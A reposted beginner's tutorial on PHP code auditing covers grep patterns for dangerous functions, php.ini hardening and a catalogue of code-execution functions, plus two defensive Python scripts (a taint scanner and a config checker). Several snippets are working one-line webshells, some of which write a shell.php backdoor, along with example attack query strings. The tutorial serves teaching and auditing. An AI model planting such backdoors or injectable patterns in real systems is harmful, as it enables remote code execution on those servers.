Learning PHP Code Auditing Together | Beginner's Guide
<p style="font-size: 16px; color: black; line-height: 40px; text-align: left; margin-bottom: 15px;"><strong style="color: blue;">Introduction to PHP Code Auditing</strong></p>
<p style="font-size: 16px; color: black; line-height: 40px; text-align: left; margin-bottom: 15px;">Code auditing means inspecting source code for bugs and security defects. It is a skill that draws on several areas at once: you need a grasp of programming and of vulnerability principles, and you also have to understand system services, middleware and the like. For a beginner this can easily become the sad story of "code auditing: from getting started to giving up", so the learning path matters; here we lay out a learning route together to organize our thinking.</p>
<p style="font-size: 16px; color: black; line-height: 40px; text-align: left; margin-bottom: 15px;"><strong style="color: blue;">A Beginner's Path to Code Auditing: Foundations</strong></p>
<h3 style="color: black; text-align: left; margin-bottom: 10px;"><strong style="color: blue;">1. Programming Languages</strong></h3>
<p style="font-size: 16px; color: black; line-height: 40px; text-align: left; margin-bottom: 15px;">1. Front-end languages: HTML, JavaScript and DOM manipulation, mainly for hunting XSS; jQuery, mainly for writing scripts that involve CSRF, DOM-based XSS, JSON hijacking and the like.</p>
<p style="font-size: 16px; color: black; line-height: 40px; text-align: left; margin-bottom: 15px;">2. Back-end languages: know the basic syntax, e.g. variable types, constants, arrays (lists, tuples and dicts in Python), objects, class invocation, references and so on. Be clear about the MVC design pattern, since most target programs are built on MVC, including but not limited to PHP, Python and Java (as everyone knows, once you can read one language the others come easily). You do not need to be able to write the code, but you must be able to read it, and read its logic: know how a given feature is typically implemented and what vulnerability types it may produce. That makes it easier to find the common vulnerability classes, and easier still to find logic flaws.</p>
<h3 style="color: black; text-align: left; margin-bottom: 10px;"><strong style="color: blue;">2. Penetration Testing Skills</strong></h3>
<p style="font-size: 16px; color: black; line-height: 40px; text-align: left; margin-bottom: 15px;">1. Be able to use the common penetration tools such as sqlmap, AWVS and Burp Suite (finding bugs straight from the tools, script-kiddie style, is rewarding too).</p>
<p style="font-size: 16px; color: black; line-height: 40px; text-align: left; margin-bottom: 15px;">2. Be able to test manually. Why penetration skills matter: first, once you have found a vulnerability, ordinary development skills are not enough to build the payload; special payload-construction techniques are needed. Second, while hunting, those skills help you find vulnerabilities faster.</p>
<h3 style="color: black; text-align: left; margin-bottom: 10px;"><strong style="color: blue;">3. Supporting Skills</strong></h3>
<p style="font-size: 16px; color: black; line-height: 40px; text-align: left; margin-bottom: 15px;">1. Protocols: e.g. the HTTP transport methods, dict://, file:// and so on; know how headers are forged, e.g. X-Forwarded-For in XFF injection, cookie injection, CRLF request forgery, etc.</p>
<p style="font-size: 16px; color: black; line-height: 40px; text-align: left; margin-bottom: 15px;">2. Deploying the application: when auditing you must be able to set the program up; otherwise you are limited to static review and cannot debug dynamically, which is what lets you find vulnerabilities faster and more effectively.</p>
<p style="font-size: 16px; color: black; line-height: 40px; text-align: left; margin-bottom: 15px;">3. URL construction and URL routing.</p>
<p style="font-size: 16px; color: black; line-height: 40px; text-align: left; margin-bottom: 15px;">4. SQL statements and database features: mainly relevant to SQL injection and to building injection payloads that bypass filters.</p>
<p style="font-size: 16px; color: black; line-height: 40px; text-align: left; margin-bottom: 15px;">5. Middleware and server features: some code vulnerabilities stem from middleware or server behaviour, e.g. the IIS 6.0 parsing vulnerability and the nginx parsing vulnerability.</p>
<p style="font-size: 16px; color: black; line-height: 40px; text-align: left; margin-bottom: 15px;">6. Audit helper tools: an IDE such as PhpStorm for tracing code, which can be paired with Xdebug for convenient debugging; source code audit tools such as RIPS and the Seay audit tool help you locate where a vulnerability originates faster.</p>
<h3 style="color: black; text-align: left; margin-bottom: 10px;"><strong style="color: blue;">4. Vulnerability Discovery</strong></h3>
<p style="font-size: 16px; color: black; line-height: 40px; text-align: left; margin-bottom: 15px;">1. Understand how each vulnerability type arises.</p>
<p style="font-size: 16px; color: black; line-height: 40px; text-align: left; margin-bottom: 15px;">2. Understand the threats created by passing unsafe parameters to dangerous functions, e.g. the command- and code-execution functions eval, assert, array_map, usort and so on, and the weaknesses of certain functions themselves, e.g. is_numeric, md5.</p>
<p style="font-size: 16px; color: black; line-height: 40px; text-align: left; margin-bottom: 15px;">3. Know the weak spots of PHP, e.g. == versus ===; even === is not unbreakable, and it has to be judged together with the program's design logic.</p>
<p style="font-size: 16px; color: black; line-height: 40px; text-align: left; margin-bottom: 15px;">4. PHP tricks and quirks.</p>
<p style="font-size: 16px; color: black; line-height: 40px; text-align: left; margin-bottom: 15px;">5. Threats that arise when a PHP version or configuration weakness is combined with improper use of a function.</p>
<p style="font-size: 16px; color: black; line-height: 40px; text-align: left; margin-bottom: 15px;">Finally: where can we learn all this? For front-end and back-end languages and SQL syntax, the Runoob tutorials (菜鸟教程) are enough; we only need to be able to read code, so this can be self-taught. The rest we will study in detail in later articles.</p>
<p style="font-size: 16px; color: black; line-height: 40px; text-align: left; margin-bottom: 15px;"><strong style="color: blue;">A Beginner's Path to Code Auditing: Approach</strong></p>
<p style="font-size: 16px; color: black; line-height: 40px; text-align: left; margin-bottom: 15px;">The way of thinking behind code auditing is also something we need to learn.</p>
<p style="font-size: 16px; color: black; line-height: 40px; text-align: left; margin-bottom: 15px;"><strong style="color: blue;">Two basic auditing methods</strong></p>
<p style="font-size: 16px; color: black; line-height: 40px; text-align: left; margin-bottom: 15px;">Follow the user's input data and judge whether each piece of code logic the data passes through offers an exploitable point; the "code logic" here may be a function or a small conditional statement.</p>
<p style="font-size: 16px; color: black; line-height: 40px; text-align: left; margin-bottom: 15px;">Starting from the characteristics of each programming language and the functions and features that have historically produced vulnerabilities, find those points, then analyze the parameters at each call site; if a parameter is user-controllable, a security vulnerability is very likely.</p>
<p style="font-size: 16px; color: black; line-height: 40px; text-align: left; margin-bottom: 15px;"><strong style="color: blue;">Preparation before hunting</strong></p>
<p style="font-size: 16px; color: black; line-height: 40px; text-align: left; margin-bottom: 15px;">Understand that today's CMSes fall roughly into two kinds: single-entry and multi-entry.</p>
<p style="font-size: 16px; color: black; line-height: 40px; text-align: left; margin-bottom: 15px;">1. Multi-entry CMS: each feature is reached through a different file.</p>
<p style="font-size: 16px; color: black; line-height: 40px; text-align: left; margin-bottom: 15px;">2. Single-entry CMS: built with MVC, so we need to be clear about the MVC architecture.</p>
<p style="font-size: 16px; color: black; line-height: 40px; text-align: left; margin-bottom: 15px;"><strong style="color: blue;">Ways to find vulnerabilities</strong></p>
<p style="font-size: 16px; color: black; line-height: 40px; text-align: left; margin-bottom: 15px;">1. Search for the functions that obtain user input to find the source of the data, then take that as the starting point, follow the data flow and analyze how the data is handled along the way, thereby locating the points that may trigger a vulnerability.</p>
<p style="font-size: 16px; color: black; line-height: 40px; text-align: left; margin-bottom: 15px;">2. Search for the functions that frequently cause security problems, e.g. functions that run database queries, execute system commands or operate on files, then trace back the parameters at their call sites and judge whether we control them, thereby locating the vulnerable point.</p>
<p style="font-size: 16px; color: black; line-height: 40px; text-align: left; margin-bottom: 15px;">3. Common PHP regexes (pattern, then what it finds):</p>
<p style="font-size: 16px; color: black; line-height: 40px; text-align: left; margin-bottom: 15px;">$_SERVER|$_COOKIE|$_REQUEST|$_GET|$_POST (user input)</p>
<p style="font-size: 16px; color: black; line-height: 40px; text-align: left; margin-bottom: 15px;">eval(|assert(|system( (command execution)</p>
<p style="font-size: 16px; color: black; line-height: 40px; text-align: left; margin-bottom: 15px;">require(|require_once(|include(|include_once( (file inclusion)</p>
<p style="font-size: 16px; color: black; line-height: 40px; text-align: left; margin-bottom: 15px;">file_get_contents(|file(|fopen(|highlight_file(|show_source(|unlink (file read, write, delete)</p>
<p style="font-size: 16px; color: black; line-height: 40px; text-align: left; margin-bottom: 15px;">simplexml_load_string (XXE)</p>
<p style="font-size: 16px; color: black; line-height: 40px; text-align: left; margin-bottom: 15px;">unserialize (deserialization vulnerabilities)</p>
<p style="font-size: 16px; color: black; line-height: 40px; text-align: left; margin-bottom: 15px;"><strong style="color: blue;">PHP Configuration First</strong></p>
<p style="font-size: 16px; color: black; line-height: 40px; text-align: left; margin-bottom: 15px;"><strong style="color: blue;">1. PHP configuration: configuration files</strong></p>
<p style="font-size: 16px; color: black; line-height: 40px; text-align: left; margin-bottom: 15px;">php.ini: global. .user.ini: per user.</p>
<p style="font-size: 16px; color: black; line-height: 40px; text-align: left; margin-bottom: 15px;"><strong style="color: blue;">2. PHP configuration: syntax</strong></p>
<p style="font-size: 16px; color: black; line-height: 40px; text-align: left; margin-bottom: 15px;">Directives take the form directive=value. Directive names are case-sensitive (foo=bar is different from FOO=bar). The value can be a quoted string ("foo"), a number (integer or float: 0, 1, 55, -1, 32.2), a PHP constant (E_ALL, M_PI), an INI constant (On, Off, none) or an expression (E_ALL&amp;~E_NOTICE). Expressions in INI files may only use bitwise operators, logical NOT and parentheses: | bitwise OR, &amp; bitwise AND, ~ bitwise NOT, ! logical NOT. Booleans are written On (enabled) and Off (disabled).</p>
<p style="font-size: 16px; color: black; line-height: 40px; text-align: left; margin-bottom: 15px;"><strong style="color: blue;">3. PHP configuration: variable-related settings</strong></p>
<p style="font-size: 16px; color: black; line-height: 40px; text-align: left; margin-bottom: 15px;">Global variable registration: register_globals = Off</p>
<p style="font-size: 16px; color: black; line-height: 40px; text-align: left; margin-bottom: 15px;">Some programs such as osc need register_globals enabled. The setting controls automatic registration of global variables: when it is On, PHP registers every $key=&gt;$value pair of the $_POST, $_GET, $_COOKIE, $_ENV and $_SESSION arrays directly as a variable (so $_POST['username'] becomes $username). That causes three problems: 1. you cannot tell where a variable came from ($_POST or $_SESSION?), which makes the code harder for others to read; 2. variables overwrite one another, causing needless trouble; 3. security problems. So it is normally set to Off.</p>
<p style="font-size: 16px; color: black; line-height: 40px; text-align: left; margin-bottom: 15px;">Short tags: short_open_tag = On</p>
<p style="font-size: 16px; color: black; line-height: 40px; text-align: left; margin-bottom: 15px;">Decides whether the abbreviated form of the PHP opening tag (&lt;? ?&gt;) may be used. If disabled, the full form (&lt;?php ?&gt;) is required. The directive also affects the shorthand &lt;?=, which is equivalent to &lt;?echo; using it needs short_open_tag = On, although since PHP 5.4.0 &lt;?= is always available. (When writing a shell, a filter may block anything containing &lt;?php ?&gt;; if short tags are enabled, the abbreviated form can be considered.)</p>
<p style="font-size: 16px; color: black; line-height: 40px; text-align: left; margin-bottom: 15px;"><strong style="color: blue;">4. PHP configuration: common important settings, safe mode</strong></p>
<p style="font-size: 16px; color: black; line-height: 40px; text-align: left; margin-bottom: 15px;">Safe mode: safe_mode = Off</p>
<p style="font-size: 16px; color: black; line-height: 40px; text-align: left; margin-bottom: 15px;">PHP's safe mode was a very important built-in security mechanism: it could control some PHP functions such as system(), put permission checks on many file-operation functions, and refuse access to certain key files such as /etc/passwd. The default php.ini does not enable it, and the feature was deprecated in PHP 5.3.0 and removed in PHP 5.4.0.</p>
<p style="font-size: 16px; color: black; line-height: 40px; text-align: left; margin-bottom: 15px;">Directory for programs executed in safe mode: safe_mode_exec_dir = /var/www/html</p>
<p style="font-size: 16px; color: black; line-height: 40px; text-align: left; margin-bottom: 15px;">When PHP runs in safe mode, system() and the other program-execution functions refuse to launch programs outside this directory. / must be used as the directory separator, including on Windows. Simply put, only programs inside this directory can be executed.</p>
<p style="font-size: 16px; color: black; line-height: 40px; text-align: left; margin-bottom: 15px;">Disabled classes and functions: disable_classes = , disable_functions = , for example disable_functions = opendir,readdir,scandir,fopen,unlink</p>
<p style="font-size: 16px; color: black; line-height: 40px; text-align: left; margin-bottom: 15px;">Disables certain classes or functions; takes a comma-separated list of names. Can only be set in php.ini.</p>
<p style="font-size: 16px; color: black; line-height: 40px; text-align: left; margin-bottom: 15px;"><strong style="color: blue;">5. PHP configuration: common important settings, file uploads and directory permissions</strong></p>
<p style="font-size: 16px; color: black; line-height: 40px; text-align: left; margin-bottom: 15px;">Enable uploads and the maximum upload size: file_uploads = On, upload_max_filesize = 8M</p>
<p style="font-size: 16px; color: black; line-height: 40px; text-align: left; margin-bottom: 15px;">Temporary upload directory: upload_tmp_dir = (the directory in which uploaded files are held temporarily; it must be writable, and if unset the system temporary directory is used: /tmp or C:\Windows\Temp).</p>
<p style="font-size: 16px; color: black; line-height: 40px; text-align: left; margin-bottom: 15px;">Restricting the directories a script may access: open_basedir = .:/tmp/</p>
<p style="font-size: 16px; color: black; line-height: 40px; text-align: left; margin-bottom: 15px;">open_basedir confines PHP scripts to the listed directories, so a script cannot touch files it should not, which limits the damage a PHP shell can do. It is usually restricted to the site directory; the value above allows the current directory (the one containing the script) and /tmp/, which effectively stops a PHP backdoor from crossing into other sites.</p>
<p style="font-size: 16px; color: black; line-height: 40px; text-align: left; margin-bottom: 15px;"><strong style="color: blue;">6. PHP configuration: common important settings, error messages</strong></p>
<p style="font-size: 16px; color: black; line-height: 40px; text-align: left; margin-bottom: 15px;">Error display: display_errors = On</p>
<p style="font-size: 16px; color: black; line-height: 40px; text-align: left; margin-bottom: 15px;">Whether error messages become part of the output. Turn this off once the site is live to avoid leaking information; it only needs to be on while debugging.</p>
<p style="font-size: 16px; color: black; line-height: 40px; text-align: left; margin-bottom: 15px;">Error reporting level: error_reporting = E_ALL</p>
<p style="font-size: 16px; color: black; line-height: 40px; text-align: left; margin-bottom: 15px;">Sets the error level to the highest, showing every error, which helps with debugging and with writing quality code. The levels are constants listed in php.ini; E_ALL|E_STRICT, i.e. every level, is recommended.</p>
<p style="font-size: 16px; color: black; line-height: 40px; text-align: left; margin-bottom: 15px;">Error log: error_log = (the location of the error log; it must be writable by the web user, and if undefined errors go to the web server's own error log).</p>
<p style="font-size: 16px; color: black; line-height: 40px; text-align: left; margin-bottom: 15px;">log_errors = On (recommended: write errors to a log file rather than to the front end).</p>
<p style="font-size: 16px; color: black; line-height: 40px; text-align: left; margin-bottom: 15px;">log_errors_max_len = 1024 (maximum length of the information logged per error; 0 means unlimited).</p>
<p style="font-size: 16px; color: black; line-height: 40px; text-align: left; margin-bottom: 15px;"><strong style="color: blue;">7. PHP configuration: common important settings, magic quotes and remote files</strong></p>
<p style="font-size: 16px; color: black; line-height: 40px; text-align: left; margin-bottom: 15px;">Magic quotes (deprecated in PHP 5.3.0, removed in PHP 5.4.0): magic_quotes_gpc = On, magic_quotes_runtime = Off</p>
<p style="font-size: 16px; color: black; line-height: 40px; text-align: left; margin-bottom: 15px;">Sets the magic_quotes state for GPC (GET/POST/COOKIE) operations. When magic_quotes is On, every ' (single quote), " (double quote), \ (backslash) and NULL is automatically escaped with a backslash.</p>
<p style="font-size: 16px; color: black; line-height: 40px; text-align: left; margin-bottom: 15px;">Allow opening remote files: allow_url_fopen = On</p>
<p style="font-size: 16px; color: black; line-height: 40px; text-align: left; margin-bottom: 15px;">Activates the URL-style fopen wrappers so that URL objects can be accessed like files. The default wrappers provide ftp and http access to remote files, and some extensions such as zlib may register further wrappers. Example: &lt;?php echo file_get_contents("http://php.net"); ?&gt;</p>
<p style="font-size: 16px; color: black; line-height: 40px; text-align: left; margin-bottom: 15px;">Allow including remote files: allow_url_include = Off</p>
<p style="font-size: 16px; color: black; line-height: 40px; text-align: left; margin-bottom: 15px;">Allows include, include_once, require and require_once to use the URL fopen wrappers; simply put, remote files can be included. Example: &lt;?php include("http://php.net"); ?&gt;</p>
<p style="font-size: 16px; color: black; line-height: 40px; text-align: left; margin-bottom: 15px;"><strong style="color: blue;">Summary of PHP Code Execution Functions</strong></p><span style="color: black;">
</span>
<p style="font-size: 16px; color: black; line-height: 40px; text-align: left; margin-bottom: 15px;">Functions in PHP that can execute code are commonly used to write one-line backdoors and may give rise to code-execution vulnerabilities; here we summarize the code-execution functions.</p>
<p style="font-size: 16px; color: black; line-height: 40px; text-align: left; margin-bottom: 15px;">Common code-execution functions include array_map(), call_user_func(), call_user_func_array(), array_filter(), usort() and uasort(), the file-operation functions, and dynamic functions ($a($b)).</p>
<p style="font-size: 16px; color: black; line-height: 40px; text-align: left; margin-bottom: 15px;"><strong style="color: blue;">1. eval()</strong></p>
<p style="font-size: 16px; color: black; line-height: 40px; text-align: left; margin-bottom: 15px;">eval() evaluates a string as PHP code, as in the common one-line backdoor:</p>
<pre>&lt;?php eval($_POST['x']); ?&gt;</pre>
<p style="font-size: 16px; color: black; line-height: 40px; text-align: left; margin-bottom: 15px;"><strong style="color: blue;">2. assert()</strong></p>
<p style="font-size: 16px; color: black; line-height: 40px; text-align: left; margin-bottom: 15px;">Similar to eval(): the string is executed by assert() as PHP code. Example code:</p>
<pre>&lt;?php
// ?cmd=phpinfo()
assert($_REQUEST['cmd']);
?&gt;</pre>
<p style="font-size: 16px; color: black; line-height: 40px; text-align: left; margin-bottom: 15px;"><strong style="color: blue;">3. preg_replace()</strong></p>
<p style="font-size: 16px; color: black; line-height: 40px; text-align: left; margin-bottom: 15px;">mixed preg_replace ( mixed $pattern , mixed $replacement , mixed $subject [, int $limit = -1 [, int &amp;$count ]] )</p>
<p style="font-size: 16px; color: black; line-height: 40px; text-align: left; margin-bottom: 15px;">Searches subject for matches of pattern and replaces them with replacement. preg_replace() is meant to perform a regular-expression search and replace, but the dangerous /e modifier makes preg_replace() treat the $replacement parameter as PHP code. Example code:</p>
<pre>&lt;?php
// ?cmd=phpinfo()
@preg_replace("/abc/e", $_REQUEST['cmd'], "abcd");
?&gt;</pre>
<p style="font-size: 16px; color: black; line-height: 40px; text-align: left; margin-bottom: 15px;"><strong style="color: blue;">4. create_function()</strong></p>
<p style="font-size: 16px; color: black; line-height: 40px; text-align: left; margin-bottom: 15px;">create_function() is mainly used to create anonymous functions. If the parameters passed to it are not strictly filtered, an attacker can hand create_function() a specially constructed string and execute arbitrary commands. Example code:</p>
<pre>&lt;?php
// ?cmd=phpinfo();
$func = create_function('', $_REQUEST['cmd']);
$func();
?&gt;</pre>
<p style="font-size: 16px; color: black; line-height: 40px; text-align: left; margin-bottom: 15px;"><strong style="color: blue;">5. array_map()</strong></p>
<p style="font-size: 16px; color: black; line-height: 40px; text-align: left; margin-bottom: 15px;">array_map() applies a user-defined function to each value of an array and returns an array holding the new values. The callback should accept as many parameters as there are arrays passed to array_map(). Example code:</p>
<pre>&lt;?php
// ?func=system&amp;cmd=whoami
$func = $_GET['func'];
$cmd = $_GET['cmd'];
$array = array($cmd);
$new_array = array_map($func, $array);
// print_r($new_array);
?&gt;</pre>
<p style="font-size: 16px; color: black; line-height: 40px; text-align: left; margin-bottom: 15px;"><strong style="color: blue;">6. call_user_func() / call_user_func_array()</strong></p>
<p style="font-size: 16px; color: black; line-height: 40px; text-align: left; margin-bottom: 15px;">call_user_func calls its first parameter as a callback; the remaining parameters become the callback's arguments.</p>
<p style="font-size: 16px; color: black; line-height: 40px; text-align: left; margin-bottom: 15px;">call_user_func_array calls the callback with the elements of an array as its arguments.</p>
<pre>&lt;?php
// ?cmd=phpinfo()
@call_user_func("assert", $_GET['cmd']);
?&gt;</pre>
<pre>&lt;?php
// ?cmd=phpinfo()
$cmd = $_GET['cmd'];
$array = array($cmd);
call_user_func_array("assert", $array);
?&gt;</pre>
<p style="font-size: 16px; color: black; line-height: 40px; text-align: left; margin-bottom: 15px;"><strong style="color: blue;">7. array_filter()</strong></p>
<p style="font-size: 16px; color: black; line-height: 40px; text-align: left; margin-bottom: 15px;">array array_filter ( array $array [, callable $callback [, int $flag = 0 ]] )</p>
<p style="font-size: 16px; color: black; line-height: 40px; text-align: left; margin-bottom: 15px;">Passes each value of array to the callback function in turn. If callback returns true, the current value of array is included in the result array. Array keys are preserved.</p>
<pre>&lt;?php
// ?func=system&amp;cmd=whoami
$cmd = $_GET['cmd'];
$array1 = array($cmd);
$func = $_GET['func'];
array_filter($array1, $func);
?&gt;</pre>
<p style="font-size: 16px; color: black; line-height: 40px; text-align: left; margin-bottom: 15px;"><strong style="color: blue;">8. usort(), uasort()</strong></p>
<p style="font-size: 16px; color: black; line-height: 40px; text-align: left; margin-bottom: 15px;">usort() sorts an array using a user-defined comparison function. uasort() sorts the values of an array with a user-defined comparison function while keeping the index association.</p>
<p style="font-size: 16px; color: black; line-height: 40px; text-align: left; margin-bottom: 15px;">Example code (the argument unpacking needs PHP &gt;= 5.6):</p>
<pre>&lt;?php usort(...$_GET); ?&gt;</pre>
<p style="font-size: 16px; color: black; line-height: 40px; text-align: left; margin-bottom: 15px;">Invocation: test.php?1[]=1-1&amp;1[]=eval($_POST['x'])&amp;2=assert with the POST body x=phpinfo();</p>
<pre>&lt;?php usort($_GET, 'asse' . 'rt'); ?&gt;</pre>
<p style="font-size: 16px; color: black; line-height: 40px; text-align: left; margin-bottom: 15px;">Invocation: test.php?1=1+1&amp;2=eval($_POST['x'])</p>
<p style="font-size: 16px; color: black; line-height: 40px; text-align: left; margin-bottom: 15px;"><strong style="color: blue;">9. File-operation functions</strong></p>
<p style="font-size: 16px; color: black; line-height: 40px; text-align: left; margin-bottom: 15px;">file_put_contents() writes a string to a file. fputs() writes to a file. Example code:</p>
<pre>&lt;?php
$test = '&lt;?php eval($_POST["x"]); ?&gt;';
file_put_contents('test1.php', $test);
?&gt;</pre>
<pre>&lt;?php fputs(fopen('shell.php', 'w'), '&lt;?php eval($_POST["x"]); ?&gt;'); ?&gt;</pre>
<p style="font-size: 16px; color: black; line-height: 40px; text-align: left; margin-bottom: 15px;"><strong style="color: blue;">10. Dynamic functions</strong></p>
<p style="font-size: 16px; color: black; line-height: 40px; text-align: left; margin-bottom: 15px;">The PHP function to call is assembled directly from strings. Example code:</p>
<pre>&lt;?php
// ?a=assert&amp;b=phpinfo()
$_GET['a']($_GET['b']);
?&gt;</pre>
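The two auditing methods from the approach section (follow the input forward, or start from the dangerous functions and trace their arguments back), the regex list given there, and the code-execution functions just summarized can be combined into a first-pass audit script. The Python below is an added example, not the article's code or any tool it names (RIPS, Seay); the PHP it scans is a constructed sample, and the only function names it knows are the ones the article lists.

```python
"""Source-to-sink grep for PHP, written as an added example for this article
(not the article's code or any tool it names).  The article's "common PHP
regexes" become SOURCE_RE and SINK_RE, its ten code-execution functions join
the sink list, and a line-by-line pass marks variables assigned from a
superglobal as tainted, then reports each sink call whose argument text, or
whose callee in a dynamic $var() call, is user-controlled."""
import re

# The article's "get user input" regex as a real pattern.
SOURCE_RE = re.compile(r"\$_(?:SERVER|COOKIE|REQUEST|GET|POST)\b")

# Sinks by vulnerability class: the article's regex lines plus the functions
# it walks through in the code-execution summary.
SINKS = {
    "code/command execution": [
        "eval", "assert", "system", "preg_replace", "create_function",
        "array_map", "call_user_func", "call_user_func_array",
        "array_filter", "usort", "uasort"],
    "file inclusion": ["require", "require_once", "include", "include_once"],
    "file read/write/delete": [
        "file_get_contents", "file", "fopen", "file_put_contents", "fputs",
        "highlight_file", "show_source", "unlink"],
    "XXE": ["simplexml_load_string"],
    "deserialization": ["unserialize"],
}
SINK_CLASS = {f: cls for cls, fs in SINKS.items() for f in fs}
# Sink name followed by '(' and not glued to a preceding word or '$'.
SINK_RE = re.compile(
    r"(?<![\w$])(" + "|".join(map(re.escape, SINK_CLASS)) + r")\s*\(")
# Dynamic call $f(...) or $_GET['a'](...): the article's "dynamic function" item.
DYNAMIC_CALL_RE = re.compile(r"(\$\w+(?:\[[^\]]*\])?)\s*\(")
# Plain assignment $var = rhs;  ((?!=) keeps == comparisons out).
ASSIGN_RE = re.compile(r"(\$\w+)\s*=(?!=)\s*(.+?);")
VAR_RE = re.compile(r"\$\w+")


def audit(php_source):
    """Return [(line_no, sink, vuln_class, reason)] in line order."""
    tainted = set()      # variables that received user input so far
    findings = []

    def is_tainted(text):
        return bool(SOURCE_RE.search(text)) or any(
            v in tainted for v in VAR_RE.findall(text))

    for no, line in enumerate(php_source.splitlines(), 1):
        # 1. Propagate taint through the assignments on this line.
        for var, rhs in ASSIGN_RE.findall(line):
            if is_tainted(rhs):
                tainted.add(var)
        # 2. Listed sinks whose argument text is user-controlled
        #    (everything after the '(' is treated as the argument text).
        for m in SINK_RE.finditer(line):
            if is_tainted(line[m.end():]):
                name = m.group(1)
                findings.append((no, name, SINK_CLASS[name], "tainted argument"))
        # 3. Dynamic calls where the callee itself is user-controlled.
        for m in DYNAMIC_CALL_RE.finditer(line):
            if is_tainted(m.group(1)):
                findings.append((no, m.group(1) + "()",
                                 "code/command execution", "tainted callee"))
    return findings


# Constructed sample (not from the article); the opening tag is omitted and
# the comments name the article item each line mirrors.
SAMPLE_PHP = "\n".join([
    "// constructed sample fragment",                  # line 1
    "$cmd = $_GET['cmd'];",                            # line 2
    "$array = array($cmd);",                           # line 3
    "$new = array_map($_GET['func'], $array);",        # line 4: item 5
    "file_put_contents('audit.log', date('c'));",      # line 5: constant args
    "eval($_POST['x']);",                              # line 6: item 1
    "$tpl = 'pages/' . $_REQUEST['page'];",            # line 7
    "include($tpl . '.php');",                         # line 8: via $tpl
    "$_GET['a']($_GET['b']);",                         # line 9: item 10
    "$data = unserialize($_COOKIE['session']);",       # line 10
    "echo htmlspecialchars($cmd);",                    # line 11: not a sink
])

if __name__ == "__main__":
    for no, sink, cls, reason in audit(SAMPLE_PHP):
        print(f"line {no}: {sink} [{cls}] {reason}")
```

Findings are leads for manual review, not verdicts: the scanner works one line at a time, so taint that crosses function or file boundaries is not followed, and a sanitizer it does not know about does not clear a variable.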
<p style="font-size: 16px; color: black; line-height: 40px; text-align: left; margin-bottom: 15px;"><strong style="color: blue;">This article is part of a series; follow for the later installments.</strong></p>
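The directives discussed in the configuration section above, turned into an automated php.ini check. This Python script is an added example and not the article's own code: its parser follows the directive=value syntax the section describes, each rule states only what the section says about that directive, and the two INI fragments (including the /var/log/php_errors.log path) are constructed.

```python
"""php.ini hardening check, written as an added example for this article
(not the article's own code).  The parser follows the directive=value syntax
the configuration section describes: names are case-sensitive, ';' starts a
comment, values may be quoted strings, numbers or the On/Off booleans."""

BOOL_ON = {"1", "on", "true", "yes"}   # spellings PHP accepts for 'enabled'


def is_on(value):
    """True when an INI value means 'enabled', case-insensitively."""
    return value.strip().lower() in BOOL_ON


def parse_ini(text):
    """Return {directive: value} for every 'directive = value' line.

    Lines are cut at the first ';' (comment), blank lines and [sections] are
    skipped, one pair of surrounding quotes is removed from the value, and
    directive names keep their case because foo and FOO are different."""
    settings = {}
    for raw in text.splitlines():
        line = raw.split(";", 1)[0].strip()
        if not line or line.startswith("["):
            continue
        name, sep, value = line.partition("=")
        if not sep:
            continue
        value = value.strip()
        if len(value) >= 2 and value[0] == value[-1] and value[0] in "\"'":
            value = value[1:-1]
        settings[name.strip()] = value
    return settings


# (directive, predicate on the parsed value (None when absent), advice).
# An absent directive is only judged where 'absent' itself is the weakness.
CHECKS = [
    ("register_globals", lambda v: v is not None and is_on(v),
     "On registers every $_GET/$_POST/$_COOKIE/... key as a variable; set Off"),
    ("short_open_tag", lambda v: v is not None and is_on(v),
     "the short opening tag is accepted, so a filter that only looks for the "
     "full form misses it"),
    ("display_errors", lambda v: v is not None and is_on(v),
     "errors are sent to the client; set Off once the site is live"),
    ("log_errors", lambda v: v is not None and not is_on(v),
     "errors should go to a log file instead of the front end; set On"),
    ("allow_url_include", lambda v: v is not None and is_on(v),
     "include/require accept URLs, i.e. remote file inclusion; set Off"),
    ("open_basedir", lambda v: not v,
     "scripts may read any path the web user can; restrict to the site directory"),
    ("disable_functions", lambda v: not v,
     "no functions disabled; list the dangerous ones the application does not need"),
    ("safe_mode", lambda v: v is not None,
     "removed in PHP 5.4.0; the directive is ignored and gives false comfort"),
    ("magic_quotes_gpc", lambda v: v is not None,
     "removed in PHP 5.4.0; nothing is escaped any more"),
]


def check_hardening(ini_text):
    """Return [(directive, value_or_None, advice)] for every rule that fires."""
    settings = parse_ini(ini_text)
    return [(name, settings.get(name), advice)
            for name, weak, advice in CHECKS if weak(settings.get(name))]


# Constructed fragments (not from the article): the weak values the
# configuration section warns about, and a hardened counterpart.
WEAK_INI = """\
[PHP]
register_globals = On
short_open_tag = On
display_errors = On          ; fine while debugging, not in production
log_errors = Off
allow_url_include = On
open_basedir =
disable_functions =
safe_mode = Off              ; stale since PHP 5.4.0
magic_quotes_gpc = On        ; stale since PHP 5.4.0
"""

HARDENED_INI = """\
[PHP]
register_globals = Off
short_open_tag = Off
display_errors = Off
log_errors = On
error_log = /var/log/php_errors.log   ; constructed path
allow_url_include = Off
open_basedir = "/var/www/html:/tmp/"
disable_functions = opendir,readdir,scandir,fopen,unlink   ; article's example list
"""

if __name__ == "__main__":
    for name, value, advice in check_hardening(WEAK_INI):
        print(f"{name} = {value!r}: {advice}")
    print("hardened fragment:", check_hardening(HARDENED_INI) or "no findings")
```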
<p style="font-size: 16px; color: black; line-height: 40px; text-align: left; margin-bottom: 15px;">Article reposted from the WeChat public account 掌控安全EDU.</p>